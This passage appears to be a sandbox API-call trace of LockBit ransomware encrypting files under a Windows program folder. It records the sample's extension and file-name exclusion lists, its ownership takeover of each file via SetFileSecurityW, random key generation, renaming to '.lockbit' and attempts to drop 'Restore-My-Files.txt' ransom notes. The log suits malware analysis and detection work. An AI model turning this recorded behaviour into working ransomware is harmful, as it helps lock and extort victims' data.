returned -1 [0085.753] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.753] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.753] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.753] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.754] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.754] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.754] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.754] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.754] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.754] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 102 [0085.754] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.754] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.755] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.755] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.755] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.755] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.755] RtlFreeAnsiString (AnsiString="\\") [0085.755] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0085.755] malloc (_Size=0x200) returned 0x77d800 [0085.755] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.756] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.756] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.756] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.756] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.756] CloseHandle (hObject=0x3c0) returned 1 [0085.757] free (_Block=0x77d800) [0085.757] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.757] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.757] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.757] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0085.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.757] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.757] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.758] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.758] ReadFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.768] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.768] malloc (_Size=0xe2) returned 0x1ff1e60 [0085.768] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xe2, FileInformationClass=0xa) returned 0x0 [0085.769] free (_Block=0x1ff1e60) [0085.769] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.769] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.769] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.769] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa606d4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa606d4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0085.769] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.769] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.769] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0085.769] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.769] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.769] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.769] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.770] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.770] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.770] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.770] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.770] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.771] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.771] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.771] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.771] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.771] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.771] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.771] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.771] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.771] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.772] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.772] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.772] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.772] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0085.772] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0085.772] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.772] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png") returned=".png" [0085.772] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.772] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.772] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.772] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.773] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.773] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.773] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.773] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.773] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.773] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.773] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.773] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.773] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.773] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.773] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.773] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.773] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.773] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png.lockbit") returned 97 [0085.773] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.774] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.774] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.774] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.774] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.775] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.833] RtlFreeAnsiString (AnsiString="\\") [0085.833] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0085.833] malloc (_Size=0x200) returned 0x77d800 [0085.834] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.834] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.834] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.834] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.834] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.835] CloseHandle (hObject=0x3b8) returned 1 [0085.835] free (_Block=0x77d800) [0085.835] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.835] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.835] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.835] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5025) returned 1 [0085.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.836] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.836] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.838] malloc (_Size=0xd8) returned 0x1ff1e60 [0085.838] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd8, FileInformationClass=0xa) returned 0x0 [0085.838] free (_Block=0x1ff1e60) [0085.839] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.839] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.839] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.839] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1441a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa1441a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0085.839] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.839] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.839] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0085.839] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.839] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.839] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.840] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.840] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.840] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.840] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.840] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.840] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.840] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.840] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.841] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.841] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.841] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.841] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.841] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.841] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.841] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.841] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.841] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.841] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.841] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.841] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png") returned=".png" [0085.841] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.842] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.842] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.842] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.842] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.842] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.842] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.842] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.843] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.843] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.843] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.843] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png.lockbit") returned 103 [0085.843] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff 